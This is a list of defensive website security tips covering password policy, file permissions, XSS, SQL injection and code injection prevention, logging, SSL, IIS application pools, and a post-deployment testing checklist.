Security Tips

Password Aging and complexity

Enforcing a password policy during website deployment is a very important process that reduces the password cracking and password guessing risks.

Password security countermeasures consist of the below points.

• Avoid using system defaults passwords.
• Avoid storing password in an unsecure location.
• Avoid sharing password.
• Use complex passwords.

Privileges

Ensure that the website applications – data are granted with the right roles and privileges to avoid security risks and breaches. For example, the default directory permission is 755 and default filter permission is 644.

CVSS and updates

• Developers are required to check the published Common Vulnerability Scoring System score and severity in order to take the appropriate action regarding the security breaches that might be found in the website application.
• Developers should always update their website codes to the latest stable release application version for security fixes. Otherwise, the site will be vulnerable to attacks. For example update the website encoding to use the latest version of ASP.NET.

PCI Compliance

Customer must review the PCI DSS Guidelines specially when the website is serving a credit card payment and transaction.

SOAP

Transmitting data over SOAP and XML could be intercepted, therefore using appropriate encryption algorithm to protect the sensitive data is highly recommended.

Captcha

Offers a website protection against spams originated from different website pages for example BLOG, Contact us, Registration forms, Online Polls, Newsletter etc.
the application in order to identify any vulnerability after the deployment phase.

XSS attacks

There are several categories under the XSS attacks like reflected and stored attacks. These attacks might lead to unpredicted consequences such stealing cookies via javascript, installing Trojan programs. Perform an Input validation to prevent attribute tampering and XSS injection. For example:

• In ASP.NET, add pages validateRequest=”true” in the system system area.

Database injection

• Use of prepared statements and parameterized queries.
• White list Input validation.
• Stored Procedures.
• Avoid using dynamic queries.

Code Injection

This type of attack is related to inappropriate input and output validation. An obvious example resides in the eval() function. The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Review and conduct a proper data validation to avoid the security risks on this level.

Logging

Audit logs are used to track miscellaneous activities. It is important to enable the logging on the database level to keep track of any login and changes done database levels. Furthermore, HTTP logs (Access/Errors) are very useful during debugging process, security investigation and other purposes. Thus, these logs should be kept in a secure place.

Indexing

Use the robots.txt that is placed in the website root directory to control and prevent unwanted crawling access.

Unmapped files

Adjust the mapping extension or the error handler in order to deny the file contents download or the code interpretation (e.g. render content as HTML or plaintext).

HTTP methods

Some HTTP methods can pose security risks on the web application by allowing attacker to modify the files stored on the server. Disable these methods or limit the access to trusted users.

SSL

It helps to establish a secure connection between the client and the server through the secure protocol HTTPS. Building website with SSL certificate will offer several benefits like anti-phishing, website ranking, etc

Dedicated APP pool

Application pools are used to separate sets of IIS worker processes that share the same configuration and application boundaries. It is highly recommended to create a website with a dedicated application pool since it offers isolation, better security, reliably and performance.

General guidelines and testing

• Conduct a periodic inventory on the website content and make sure that it doesn’t contain any suspicious files.
• Remove any unnecessary or unused files from the server.
• Restrict access to sensitive files.
• Restrict the HTTP upload in the application to specific trusted extensions.
• Make sure to have a recent backup copy stored locally even if the server where the website is hosted is being backed up to different locations.
• Send data with POST method through HTTPS to ensure that credentials sent using an encrypted channel instead of clear text.
• Hide the website configuration files by encrypting the files or the sensitive data into the files (e.g web.config).
• Determine if the code contains backdoor credentials.
• Test the anonymous authentication process.
• Test FTP access, restriction and directory isolation.
• Conduct SQL injection queries to make sure that the website is rejecting these queries based on a defined rules.
• Test the default account and passwords and make sure that they don’t have any access to the website.
• Test the website for cross-site scripting.
• Test the non-existent user and the wrong password.
• Test the Error handling and specially that contains sensitive information.
• Test the APIs, classes, functions, methods.
• Input validation and encoding.
• Session management and validation against brute force attacks.
• Test the HTTP response header using different tools like netcat.
• Test the path traversal vulnerability after the authentication process or find a way to get the privileges.
• Perform a penetration test toward the application in order to identify any vulnerability after the deployment phase.